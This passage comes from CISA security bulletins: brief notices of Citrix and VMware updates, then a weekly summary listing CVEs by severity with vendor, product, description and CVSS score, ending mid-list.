Citrix has released security updates to address vulnerabilities in Hypervisor. An attacker could exploit these vulnerabilities to cause a denial-of-service condition.

CISA encourages users and administrators to review Citrix Security Update CTX316325 and apply the necessary updates.

This product is provided subject to this Notification and this Privacy & Use policy.

VMware Releases Security Updates

06/23/2021 07:26 AM EDT

Original release date: June 23, 2021

VMware has released security updates to address vulnerabilities in the VMware Carbon Black App Control management server as well as VMware Tools for Windows, VMware Remote Console for Windows, and VMware App Volumes. An attacker could exploit these vulnerabilities to take control of an affected system.

CISA encourages users and administrators to review VMware Security Advisory Advisories VMSA-2021-0012 and VMSA-2021-0013 and apply the necessary updates.

This product is provided subject to this Notification and this Privacy & Use policy.

Vulnerability Summary for the Week of June 14, 2021

06/21/2021 07:16 AM EDT

Original release date: June 21, 2021

 

High Vulnerabilities

Primary
Vendor — Product
Description Published CVSS Score Source & Patch Info
bloofox — bloofoxcms bloofoxCMS 0.5.2.1 is infected with Unrestricted File Upload that allows attackers to upload malicious files (ex: php files). 2021-06-16 7.5 CVE-2020-35760
MISC
google — android In avrc_msg_cback of avrc_api.cc, there is a possible out of bounds write due to a heap buffer overflow. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-8.1 Android-9 Android-10Android ID: A-177611958 2021-06-11 10 CVE-2021-0474
MISC
google — android In memory management driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android SoCAndroid ID: A-183464866 2021-06-11 7.2 CVE-2021-0489
MISC
google — android In memory management driver, there is a possible memory corruption due to a double free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android SoCAndroid ID: A-183461321 2021-06-11 7.2 CVE-2021-0498
MISC
google — android In memory management driver, there is a possible memory corruption due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android SoCAndroid ID: A-183461320 2021-06-11 7.2 CVE-2021-0497
MISC
google — android In memory management driver, there is a possible memory corruption due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android SoCAndroid ID: A-183467912 2021-06-11 7.2 CVE-2021-0496
MISC
google — android In memory management driver, there is a possible out of bounds write due to uninitialized data. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android SoCAndroid ID: A-183459083 2021-06-11 7.2 CVE-2021-0495
MISC
google — android In memory management driver, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android SoCAndroid ID: A-183461318 2021-06-11 7.2 CVE-2021-0494
MISC
google — android In memory management driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android SoCAndroid ID: A-183461317 2021-06-11 7.2 CVE-2021-0493
MISC
google — android In memory management driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android SoCAndroid ID: A-183459078 2021-06-11 7.2 CVE-2021-0492
MISC
google — android In memory management driver, there is a possible escalation of privilege due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android SoCAndroid ID: A-183461315 2021-06-11 7.2 CVE-2021-0491
MISC
google — android In memory management driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android SoCAndroid ID: A-183464868 2021-06-11 7.2 CVE-2021-0490
MISC
google — android In onCreate of CalendarDebugActivity.java, there is a possible way to export calendar data to the sdcard without user consent due to a tapjacking/overlay attack. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-174046397 2021-06-11 7.2 CVE-2021-0487
MISC
google — android In onActivityResult of EditUserPhotoController.java, there is a possible access of unauthorized files due to an unexpected URI handler. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-8.1 Android-9 Android-10 Android-11Android ID: A-172939189 2021-06-11 9.3 CVE-2021-0481
MISC
google — android In getMinimalSize of PipBoundsAlgorithm.java, there is a possible bypass of restrictions on background processes due to a permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-174302616 2021-06-11 7.2 CVE-2021-0485
MISC
google — android In notifyScreenshotError of ScreenshotNotificationsController.java, there is a possible permission bypass due to an unsafe PendingIntent. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-8.1 Android-9Android ID: A-178189250 2021-06-11 7.2 CVE-2021-0477
MISC
google — android An improper input validation vulnerability in sflacfd_get_frm() in libsflacextractor library prior to SMR MAY-2021 Release 1 allows attackers to execute arbitrary code on mediaextractor process. 2021-06-11 7.5 CVE-2021-25387
MISC
google — android An improper input validation vulnerability in sdfffd_parse_chunk_FVER() in libsdffextractor library prior to SMR MAY-2021 Release 1 allows attackers to execute arbitrary code on mediaextractor process. 2021-06-11 7.5 CVE-2021-25386
MISC
google — android An improper input validation vulnerability in sdfffd_parse_chunk_PROP() in libsdffextractor library prior to SMR MAY-2021 Release 1 allows attackers to execute arbitrary code on mediaextractor process. 2021-06-11 7.5 CVE-2021-25385
MISC
google — android An improper input validation vulnerability in sdfffd_parse_chunk_PROP() with Sample Rate Chunk in libsdffextractor library prior to SMR MAY-2021 Release 1 allows attackers to execute arbitrary code on mediaextractor process. 2021-06-11 7.5 CVE-2021-25384
MISC
google — android An improper input validation vulnerability in scmn_mfal_read() in libsapeextractor library prior to SMR MAY-2021 Release 1 allows attackers to execute arbitrary code on mediaextractor process. 2021-06-11 7.5 CVE-2021-25383
MISC
google — android In on_l2cap_data_ind of btif_sock_l2cap.cc, there is possible memory corruption due to a use after free. This could lead to remote code execution over Bluetooth with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-10Android ID: A-175686168 2021-06-11 8.3 CVE-2021-0475
MISC
google — android In rw_t3t_process_error of rw_t3t.cc, there is a possible double free due to uninitialized data. This could lead to remote code execution over NFC with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-9 Android-10 Android-11 Android-8.1Android ID: A-179687208 2021-06-11 8.3 CVE-2021-0473
MISC
google — android An improper access control vulnerability in genericssoservice prior to SMR JUN-2021 Release 1 allows local attackers to execute protected activity with system privilege via untrusted applications. 2021-06-11 7.2 CVE-2021-25412
MISC

Back to top

 

Medium Vulnerabilities

Primary
Vendor — Product
Description Published CVSS Score Source & Patch Info
bestwebsoft — visitors_online The Visitors WordPress plugin through 0.3 is affected by an Unauthenticated Stored Cross-Site Scripting (XSS) vulnerability. The plugin would display the user’s user agent string without validation or encoding within the WordPress admin panel. 2021-06-14 4.3 CVE-2021-24350
CONFIRM
bloofox — bloofoxcms bloofoxCMS 0.5.2.1 is infected with Path traversal in the ‘fileurl’ parameter that allows attackers to read local files. 2021-06-16 4 CVE-2020-35762
MISC
bloofox — bloofoxcms bloofoxCMS 0.5.2.1 is infected with a CSRF Attack that leads to an attacker editing any file content (Locally/Remotely). 2021-06-16 4.3 CVE-2020-35759
MISC
google — android In FindOrCreatePeer of btif_av.cc, there is a possible use after free due to a race condition. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-9 Android-10Android ID: A-169252501 2021-06-11 6.9 CVE-2021-0476
MISC
google — android An improper input validation vulnerability in NPU firmware prior to SMR MAY-2021 Release 1 allows arbitrary memory write and code execution. 2021-06-11 4.6 CVE-2021-25396
MISC
google — android In BinderDiedCallback of MediaCodec.cpp, there is a possible memory corruption due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-173791720 2021-06-11 6.9 CVE-2021-0482
MISC
google — android In startIpClient of ClientModeImpl.java, there is a possible identifier which could be used to track a device. This could lead to remote information disclosure to a proximal attacker, with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10Android ID: A-154114734 2021-06-11 5 CVE-2021-0466
MISC
google — android Improper authorization in SDP SDK prior to SMR JUN-2021 Release 1 allows access to internal storage. 2021-06-11 5 CVE-2021-25417
MISC
google — android In shouldLockKeyguard of LockTaskController.java, there is a possible way to exit App Pinning without a PIN due to a permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-9 Android-10Android ID: A-176801033 2021-06-11 4.6 CVE-2021-0472
MISC
google — android Improper sanitization of incoming intent in Samsung Contacts prior to SMR JUN-2021 Release 1 allows local attackers to copy or overwrite arbitrary files with Samsung Contacts privilege. 2021-06-11 4.6 CVE-2021-25414
MISC
google — android A possible out of bounds write vulnerability in NPU driver prior to SMR JUN-2021 Release 1 allows arbitrary memory write. 2021-06-11 4.6 CVE-2021-25407
MISC
MISC
google — android A possible buffer overflow vulnerability in NPU driver prior to SMR JUN-2021 Release 1 allows arbitrary memory write and code execution. 2021-06-11 4.6 CVE-2021-25408
MISC
google — android A use after free vulnerability via race condition in MFC charger driver prior to SMR MAY-2021 Release 1 allows arbitrary write given a radio privilege is compromised. 2021-06-11 4.4 CVE-2021-25394
MISC
google — android A race condition in MFC charger driver prior to SMR MAY-2021 Release 1 allows local attackers to bypass signature check given a radio privilege is compromised. 2021-06-11 4.4 CVE-2021-25395
MISC
google — android In createPendingIntent of SnoozeHelper.java, there is a possible broadcast intent containing a sensitive identifier. This could lead to local information disclosure with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-8.1 Android-9Android ID: A-174493336 2021-06-11 4.3 CVE-2021-0480
MISC
google — chrome Type confusion in V8 in Google Chrome prior to 91.0.4472.101 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. 2021-06-15 6.8 CVE-2021-30551
MISC
MISC
google — chrome Use after free in Extensions in Google Chrome prior to 91.0.4472.101 allowed an attacker who convinced a user to install a malicious extension to potentially exploit heap corruption via a crafted HTML page. 2021-06-15 6.8 CVE-2021-30552
MISC
MISC
google — chrome Use after free in Network service in Google Chrome prior to 91.0.4472.101 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. 2021-06-15 6.8 CVE-2021-30553
MISC
MISC
google — chrome Use after free in Spell check in Google Chrome prior to 91.0.4472.101 allowed an attacker who convinced a user to install a malicious extension to potentially exploit heap corruption via a crafted HTML page. 2021-06-15 6.8 CVE-2021-30549
MISC
MISC
google — chrome Use after free in Loader in Google Chrome prior to 91.0.4472.101 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. 2021-06-15 6.8 CVE-2021-30548
MISC
MISC
google — chrome Out of bounds write in ANGLE in Google Chrome prior to 91.0.4472.101 allowed a remote attacker to potentially perform out of bounds memory access via a crafted HTML page. 2021-06-15 6.8 CVE-2021-30547
MISC
MISC
kohsei-works — yes/no_chart The Yes/No Chart WordPress plugin before 1.0.12 did not sanitise its sid shortcode parameter before using it in a SQL statement, allowing medium privilege users (contributor+) to perform Blind SQL Injection attacks 2021-06-14 4 CVE-2021-24360
CONFIRM
phpcms — phpcms Directory Traversal vulnerability in phpCMS 9.1.13 via the q parameter to public_get_suggest_keyword. 2021-06-16 5 CVE-2020-22200
MISC
posimyth — the_plus_addons_for_elementor The Plus Addons for Elementor Page Builder WordPress plugin before 4.1.11 did not properly check that a user requesting a password reset was the legitimate user, allowing an attacker to send an arbitrary reset password email to a registered user on behalf of the WordPress site. Such issue could be chained with an open redirect (CVE-2021-24358) in version below 4.1.10, to include a crafted password reset link in the email, which would lead to an account takeover. 2021-06-14 5 CVE-2021-24359
MISC
CONFIRM
posimyth — the_plus_addons_for_elementor The Plus Addons for Elementor Page Builder WordPress plugin before 4.1.10 did not validate a redirect parameter on a specifically crafted URL before redirecting the user to it, leading to an Open Redirect issue. 2021-06-14 5.8 CVE-2021-24358
MISC
CONFIRM
samsung — galaxy_watch_active_2_firmware Improper authentication vulnerability in Tizen bluetooth-frwk prior to Firmware update JUN-2021 Release allows bluetooth attacker to take over the user’s bluetooth device without user awareness. 2021-06-11 5.8 CVE-2021-25424
MISC
samsung — health Improper check vulnerability in Samsung Health prior to version 6.17 allows attacker to read internal cache data via exported component. 2021-06-11 5 CVE-2021-25425
MISC
samsung — internet Improper component protection vulnerability in Samsung Internet prior to version 14.0.1.62 allows untrusted applications to execute arbitrary activity in specific condition. 2021-06-11 4.4 CVE-2021-25418
MISC
schneider-electric — interactive_graphical_scada_system A CWE-787: Out-of-bounds write vulnerability exists inIGSS Definition (Def.exe) V15.0.0.21140 and prior that could result in loss of data or remote code execution due to lack of proper validation of user-supplied data, when a malicious CGF file is imported to IGSS Definition. 2021-06-11 6.8 CVE-2021-22754
MISC
schneider-electric — interactive_graphical_scada_system A CWE-787: Out-of-bounds write vulnerability exists inIGSS Definition (Def.exe) V15.0.0.21041 and prior that could result in loss of data or remote code execution due to missing length checks, when a malicious CGF file is imported to IGSS Definition. 2021-06-11 6.8 CVE-2021-22750
MISC
schneider-electric — interactive_graphical_scada_system A CWE-787: Out-of-bounds write vulnerability exists inIGSS Definition (Def.exe) V15.0.0.21140 and prior that could result in disclosure of information or execution of arbitrary code due to lack of input validation, when a malicious CGF (Configuration Group File) file is imported to IGSS Definition. 2021-06-11 6.8 CVE-2021-22751
MISC
schneider-electric — interactive_graphical_scada_system A CWE-787: Out-of-bounds write vulnerability exists inIGSS Definition (Def.exe) V15.0.0.21140 and prior that could result in loss of data or remote code execution due to missing size checks, when a malicious WSP (Workspace) file is being parsed by IGSS Definition. 2021-06-11 6.8 CVE-2021-22752
MISC
schneider-electric — interactive_graphical_scada_system A CWE-125: Out-of-bounds read vulnerability exists inIGSS Definition (Def.exe) V15.0.0.21140 and prior that could result in loss of data or remote code execution due to missing length checks, when a malicious WSP file is being parsed by IGSS Definition. 2021-06-11 6.8 CVE-2021-22753
MISC
schneider-electric — interactive_graphical_scada_system A CWE-125: Out-of-bounds read vulnerability exists inIGSS Definition (Def.exe) V15.0.0.21140 and prior that could result in disclosure of information or remote code execution due to lack of sanity checks on user-supplied input data, when a malicious CGF file is imported to IGSS Definition. 2021-06-11 6.8 CVE-2021-22757
MISC
schneider-electric — interactive_graphical_scada_system A CWE-787: Out-of-bounds write vulnerability exists inIGSS Definition (Def.exe) V15.0.0.21140 and prior that could result in disclosure of information or remote code execution due to lack of sanity checks on user-supplied data, when a malicious CGF file is imported to IGSS Definition. 2021-06-11 6.8 CVE-2021-22755
MISC
schneider-electric — interactive_graphical_scada_system A CWE-125: Out-of-bounds read vulnerability exists inIGSS Definition (Def.exe) V15.0.0.21140 and prior that could result in disclosure of information or remote code execution due to lack of user-supplied data validation, when a malicious CGF file is imported to IGSS Definition. 2021-06-11 6.8 CVE-2021-22756
MISC
schneider-electric — interactive_graphical_scada_system A CWE-824: Access of uninitialized pointer vulnerability exists inIGSS Definition (Def.exe) V15.0.0.21140 and prior that could result in loss of data or remote code execution due to lack validation of user-supplied input data, when a malicious CGF file is imported to IGSS Definition. 2021-06-11 6.8 CVE-2021-22758
MISC
schneider-electric — interactive_graphical_scada_system A CWE-763: Release of invalid pointer or reference vulnerability exists inIGSS Definition (Def.exe) V15.0.0.21140 and prior that could result in loss of data or remote code execution due to missing checks of user-supplied input data, when a malicious CGF file is imported to IGSS Definition. 2021-06-11 6.8 CVE-2021-22760
MISC
schneider-electric — interactive_graphical_scada_system A CWE-119: Improper Restriction of Operations within the Bounds of a Memory Buffer vulnerability exists inIGSS Definition (Def.exe) V15.0.0.21140 and prior that could result in disclosure of information or remote code e+F15xecution due to missing length check on user supplied data, when a malicious CGF file is imported to IGSS Definition. 2021-06-11 6.8 CVE-2021-22761
MISC
schneider-electric — interactive_graphical_scada_system A CWE-22: Improper Limitation of a Pathname to a Restricted Directory vulnerability exists inIGSS Definition (Def.exe) V15.0.0.21140 and prior that could result in remote code execution, when a malicious CGF or WSP file is being parsed by IGSS Definition. 2021-06-11 6.8 CVE-2021-22762
MISC
schneider-electric — interactive_graphical_scada_system A CWE-416: Use after free vulnerability exists inIGSS Definition (Def.exe) V15.0.0.21140 and prior that could result in loss of data or remote code execution due to use of unchecked input data, when a malicious CGF file is imported to IGSS Definition. 2021-06-11 6.8 CVE-2021-22759
MISC

Back to top

 

Low Vulnerabilities

Primary
Vendor — Product
Description Published CVSS Score Source & Patch Info
bloofox — bloofoxcms bloofoxCMS 0.5.2.1 is infected with XSS that allows remote attackers to execute arbitrary JS/HTML Code. 2021-06-16 3.5 CVE-2020-35761
MISC
canonical — ubuntu_linux It was discovered that read_file() in apport/hookutils.py would follow symbolic links or open FIFOs. When this function is used by the xorg-hwe-18.04 package apport hooks, it could expose private data to other local users. 2021-06-12 2.1 CVE-2021-32555
MISC
canonical — ubuntu_linux It was discovered that read_file() in apport/hookutils.py would follow symbolic links or open FIFOs. When this function is used by the xorg package apport hooks, it could expose private data to other local users. 2021-06-12 2.1 CVE-2021-32554
MISC
canonical — ubuntu_linux It was discovered that read_file() in apport/hookutils.py would follow symbolic links or open FIFOs. When this function is used by the openjdk-17 package apport hooks, it could expose private data to other local users. 2021-06-12 2.1 CVE-2021-32553
MISC
canonical — ubuntu_linux It was discovered that read_file() in apport/hookutils.py would follow symbolic links or open FIFOs. When this function is used by the openjdk-16 package apport hooks, it could expose private data to other local users. 2021-06-12 2.1 CVE-2021-32552
MISC
canonical — ubuntu_linux It was discovered that read_file() in apport/hookutils.py would follow symbolic links or open FIFOs. When this function is used by the openjdk-15 package apport hooks, it could expose private data to other local users. 2021-06-12 2.1 CVE-2021-32551
MISC
canonical — ubuntu_linux It was discovered that read_file() in apport/hookutils.py would follow symbolic links or open FIFOs. When this function is used by the openjdk-14 package apport hooks, it could expose private data to other local users. 2021-06-12 2.1 CVE-2021-32550
MISC
canonical — ubuntu_linux It was discovered that read_file() in apport/hookutils.py would follow symbolic links or open FIFOs. When this function is used by the openjdk-13 package apport hooks, it could expose private data to other local users. 2021-06-12 2.1 CVE-2021-32549
MISC
canonical — ubuntu_linux It was discovered that read_file() in apport/hookutils.py would follow symbolic links or open FIFOs. When this function is used by the openjdk-8 package apport hooks, it could expose private data to other local users. 2021-06-12 2.1 CVE-2021-32548
MISC
canonical — ubuntu_linux It was discovered that read_file() in apport/hookutils.py would follow symbolic links or open FIFOs. When this function is used by the openjdk-lts package apport hooks, it could expose private data to other local users. 2021-06-12 2.1 CVE-2021-32547
MISC
fooplugins — foogallery In the Best Image Gallery & Responsive Photo Gallery – FooGallery WordPress plugin before 2.0.35, the Custom CSS field of each gallery is not properly sanitised or validated before being being output in the page where the gallery is embed, leading to a stored Cross-Site Scripting issue. 2021-06-14 3.5 CVE-2021-24357
CONFIRM
google — android Improper caller check vulnerability in Knox Core prior to SMR MAY-2021 Release 1 allows attackers to install arbitrary app. 2021-06-11 3.6 CVE-2021-25388
MISC
MISC
google — android Improper running task check in S Secure prior to SMR MAY-2021 Release 1 allows attackers to use locked app without authentication. 2021-06-11 3.6 CVE-2021-25389
MISC
google — android Assuming EL1 is compromised, an improper address validation in RKP prior to SMR JUN-2021 Release 1 allows local attackers to create executable kernel page outside code area. 2021-06-11 2.1 CVE-2021-25416
MISC
google — android Assuming EL1 is compromised, an improper address validation in RKP prior to SMR JUN-2021 Release 1 allows local attackers to remap EL2 memory as writable. 2021-06-11 2.1 CVE-2021-25415
MISC
google — android Improper sanitization of incoming intent in Samsung Contacts prior to SMR JUN-2021 Release 1 allows local attackers to get permissions to access arbitrary data with Samsung Contacts privilege. 2021-06-11 2.1 CVE-2021-25413
MISC
google — android Improper sanitization of incoming intent in SecSettings prior to SMR MAY-2021 Release 1 allows local attackers to get permissions to access system uid data. 2021-06-11 2.1 CVE-2021-25393
MISC
MISC
google — android Improper access control of a component in CallBGProvider prior to SMR JUN-2021 Release 1 allows local attackers to access arbitrary files with an escalated privilege. 2021-06-11 3.6 CVE-2021-25410
MISC
google — android In /proc/net of the kernel filesystem, there is a possible information leak due to a permissions bypass. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10Android ID: A-9496886 2021-06-11 2.1 CVE-2019-9475
MISC
google — android In readVector of IMediaPlayer.cpp, there is a possible read of uninitialized heap data due to a missing bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-9 Android-10 Android-11 Android-8.1Android ID: A-173720767 2021-06-11 2.1 CVE-2021-0484
MISC
google — android Intent redirection vulnerability in Secure Folder prior to SMR MAY-2021 Release 1 allows attackers to execute privileged action. 2021-06-11 2.1 CVE-2021-25391
MISC
MISC
google — android Improper protection of backup path configuration in Samsung Dex prior to SMR MAY-2021 Release 1 allows local attackers to get sensitive information via changing the path. 2021-06-11 2.1 CVE-2021-25392
MISC
MISC
google — android An improper access control vulnerability in TelephonyUI prior to SMR MAY-2021 Release 1 allows local attackers to write arbitrary files of telephony process via untrusted applications. 2021-06-11 2.1 CVE-2021-25397
MISC
MISC
google — android Improper address validation vulnerability in RKP api prior to SMR JUN-2021 Release 1 allows root privileged local attackers to write read-only kernel memory. 2021-06-11 2.1 CVE-2021-25411
MISC
google — android Improper access in Notification setting prior to SMR JUN-2021 Release 1 allows physically proximate attackers to set arbitrary notification via physically configuring device. 2021-06-11 2.1 CVE-2021-25409
MISC
google — android Intent redirection vulnerability in PhotoTable prior to SMR MAY-2021 Release 1 allows attackers to execute privileged action. 2021-06-11 1.9 CVE-2021-25390
MISC
MISC
samsung — bixby_voice Intent redirection vulnerability in Bixby Voice prior to version 3.1.12 allows attacker to access contacts. 2021-06-11 2.1 CVE-2021-25398
MISC
samsung — galaxy_watch_3_plugin Improper log management vulnerability in Galaxy Watch3 PlugIn prior to version 2.2.09.21033151 allows attacker with log permissions to leak Wi-Fi password connected to the user smartphone within log. 2021-06-11 2.1 CVE-2021-25421
MISC
samsung — galaxy_watch_plugin Improper log management vulnerability in Galaxy Watch PlugIn prior to version 2.2.05.21033151 allows attacker with log permissions to leak Wi-Fi password connected to the user smartphone within log. 2021-06-11 2.1 CVE-2021-25420
MISC
samsung — gear_s Information exposure vulnerability in Gear S Plugin prior to version 2.2.05.20122441 allows unstrusted applications to access connected BT device information. 2021-06-11 3.3 CVE-2021-25406
MISC
samsung — watch_active2_plugin Improper log management vulnerability in Watch Active2 PlugIn prior to 2.2.08.21033151 version allows attacker with log permissions to leak Wi-Fi password connected to the user smartphone via log. 2021-06-11 2.1 CVE-2021-25423
MISC
samsung — watch_active_plugin Improper log management vulnerability in Watch Active PlugIn prior to version 2.2.07.21033151 allows attacker with log permissions to leak Wi-Fi password connected to the user smartphone within log. 2021-06-11 2.1 CVE-2021-25422
MISC

Back to top

 

Severity Not Yet Assigned

Primary
Vendor — Product
Description Published CVSS Score Source & Patch Info
ubuntu — ubuntu It was discovered that the process_report() function in data/whoopsie-upload-all allowed arbitrary file writes via symlinks. 2021-06-12 not yet calculated CVE-2021-32557
MISC
74cms — 74cms SQL Injection in 74cms 3.2.0 via the key parameter to plus/ajax_street.php. 2021-06-16 not yet calculated CVE-2020-22211
MISC
74cms — 74cms SQL Injection in 74cms 3.2.0 via the query parameter to plus/ajax_common.php. 2021-06-16 not yet calculated CVE-2020-22209
MISC
74cms — 74cms
 
SQL Injection in 74cms 3.2.0 via the id parameter to wap/wap-company-show.php. 2021-06-16 not yet calculated CVE-2020-22212
MISC
74cms — 74cms
 
SQL Injection in 74cms 3.2.0 via the x parameter to plus/ajax_street.php. 2021-06-16 not yet calculated CVE-2020-22208
MISC
74cms — 74cms
 
SQL Injection in 74cms 3.2.0 via the x parameter to ajax_officebuilding.php. 2021-06-16 not yet calculated CVE-2020-22210
MISC
advantech — webaccess/scada
 
Advantech WebAccess/SCADA Versions 9.0.1 and prior is vulnerable to redirection, which may allow an attacker to send a maliciously crafted URL that could result in redirecting a user to a malicious webpage. 2021-06-18 not yet calculated CVE-2021-32956
MISC
advantech — webaccess/scada
 
Advantech WebAccess/SCADA Versions 9.0.1 and prior is vulnerable to a directory traversal, which may allow an attacker to remotely read arbitrary files on the file system. 2021-06-18 not yet calculated CVE-2021-32954
MISC
apache — chainsaw
 
A deserialization flaw was found in Apache Chainsaw versions prior to 2.1.0 which could lead to malicious code execution. 2021-06-16 not yet calculated CVE-2020-9493
MISC
MLIST
MLIST
apache — cxf
 
A vulnerability in the JsonMapObjectReaderWriter of Apache CXF allows an attacker to submit malformed JSON to a web service, which results in the thread getting stuck in an infinite loop, consuming CPU indefinitely. This issue affects Apache CXF versions prior to 3.4.4; Apache CXF versions prior to 3.3.11. 2021-06-16 not yet calculated CVE-2021-30468
CONFIRM
MLIST
MLIST
MLIST
MLIST
apache — http_server
 
Apache HTTP Server protocol handler for the HTTP/2 protocol checks received request headers against the size limitations as configured for the server and used for the HTTP/1 protocol as well. On violation of these restrictions and HTTP response is sent to the client with a status code indicating why the request was rejected. This rejection response was not fully initialised in the HTTP/2 protocol handler if the offending header was the very first one received or appeared in a a footer. This led to a NULL pointer dereference on initialised memory, crashing reliably the child process. Since such a triggering HTTP/2 request is easy to craft and submit, this can be exploited to DoS the server. This issue affected mod_http2 1.15.17 and Apache HTTP Server version 2.4.47 only. Apache HTTP Server 2.4.47 was never released. 2021-06-15 not yet calculated CVE-2021-31618
MISC
MISC
MLIST
MLIST
MLIST
FEDORA
FEDORA
apache — pdfbox
 
In Apache PDFBox, a carefully crafted PDF file can trigger an infinite loop while loading the file. This issue affects Apache PDFBox version 2.0.23 and prior 2.0.x versions. 2021-06-12 not yet calculated CVE-2021-31812
MISC
MLIST
MLIST
MLIST
MLIST
MLIST
MLIST
MLIST
MLIST
MLIST
MLIST
apache — pdfbox
 
In Apache PDFBox, a carefully crafted PDF file can trigger an OutOfMemory-Exception while loading the file. This issue affects Apache PDFBox version 2.0.23 and prior 2.0.x versions. 2021-06-12 not yet calculated CVE-2021-31811
MISC
MLIST
MLIST
MLIST
MLIST
MLIST
MLIST
MLIST
MLIST
MLIST
MLIST
apollos_apps — apollos_apps
 
Apollos Apps is an open source platform for launching church-related apps. In Apollos Apps versions prior to 2.20.0, new user registrations are able to access anyone’s account by only knowing their basic profile information (name, birthday, gender, etc). This includes all app functionality within the app, as well as any authenticated links to Rock-based webpages (such as giving and events). There is a patch in version 2.20.0. As a workaround, one can patch one’s server by overriding the `create` data source method on the `People` class. 2021-06-16 not yet calculated CVE-2021-32691
MISC
MISC
CONFIRM
bandai — namco_fromsoftware_dark_souls_iii
 
Bandai Namco FromSoftware Dark Souls III allows remote attackers to execute arbitrary code. 2021-06-15 not yet calculated CVE-2021-34170
MISC
bosch — multiple_products

 

A use after free in hermes, while emitting certain error messages, prior to commit d86e185e485b6330216dee8e854455c694e3a36e allows attackers to potentially execute arbitrary code via crafted JavaScript. Note that this is only exploitable if the application using Hermes permits evaluation of untrusted JavaScript. Hence, most React Native applications are not affected. 2021-06-15 not yet calculated CVE-2021-24037
CONFIRM
CONFIRM
bosch — multiple_products
 
When using http protocol, the user password is transmitted as a clear text parameter for which it is possible to be obtained by an attacker through a MITM attack. This will be fixed starting from Firmware version 3.11.5, which will be released on the 30th of June, 2021. 2021-06-18 not yet calculated CVE-2021-23846
CONFIRM
bosch — multiple_products
 
This vulnerability could allow an attacker to hijack a session while a user is logged in the configuration web page. This vulnerability was discovered by a security researcher in B426 and found during internal product tests in B426-CN/B429-CN, and B426-M and has been fixed already starting from version 3.08 on, which was released on June 2019. 2021-06-18 not yet calculated CVE-2021-23845
CONFIRM
captive_portal — captive_portal
 
An authenticated Stored XSS (Cross-site Scripting) exists in the “captive.cgi” Captive Portal via the “Title of Login Page” text box or “TITLE” parameter in IPFire 2.21 (x86_64) – Core Update 130. It allows an authenticated WebGUI user with privileges to execute Stored Cross-site Scripting in the Captive Portal page. 2021-06-17 not yet calculated CVE-2020-19202
MISC
MISC
checksec — canopy
 
CheckSec Canopy before 3.5.2 allows XSS attacks against the login page via the LOGIN_PAGE_DISCLAIMER parameter. 2021-06-18 not yet calculated CVE-2021-34815
MISC
MISC
MISC
cisco — advanced_malware_protection
 
A vulnerability in the Cisco Advanced Malware Protection (AMP) for Endpoints integration of Cisco AsyncOS for Cisco Email Security Appliance (ESA) and Cisco Web Security Appliance (WSA) could allow an unauthenticated, remote attacker to intercept traffic between an affected device and the AMP servers. This vulnerability is due to improper certificate validation when an affected device establishes TLS connections. A man-in-the-middle attacker could exploit this vulnerability by sending a crafted TLS packet to an affected device. A successful exploit could allow the attacker to spoof a trusted host and then extract sensitive information or alter certain API requests. 2021-06-16 not yet calculated CVE-2021-1566
CISCO
cisco — anyconnect_secure_mobility_client
 
A vulnerability in the DLL loading mechanism of Cisco AnyConnect Secure Mobility Client for Windows could allow an authenticated, local attacker to perform a DLL hijacking attack on an affected device if the VPN Posture (HostScan) Module is installed on the AnyConnect client. This vulnerability is due to a race condition in the signature verification process for DLL files that are loaded on an affected device. An attacker could exploit this vulnerability by sending a series of crafted interprocess communication (IPC) messages to the AnyConnect process. A successful exploit could allow the attacker to execute arbitrary code on the affected device with SYSTEM privileges. To exploit this vulnerability, the attacker must have valid credentials on the Windows system. 2021-06-16 not yet calculated CVE-2021-1567
CISCO
cisco — anyconnect_secure_mobility_client
 
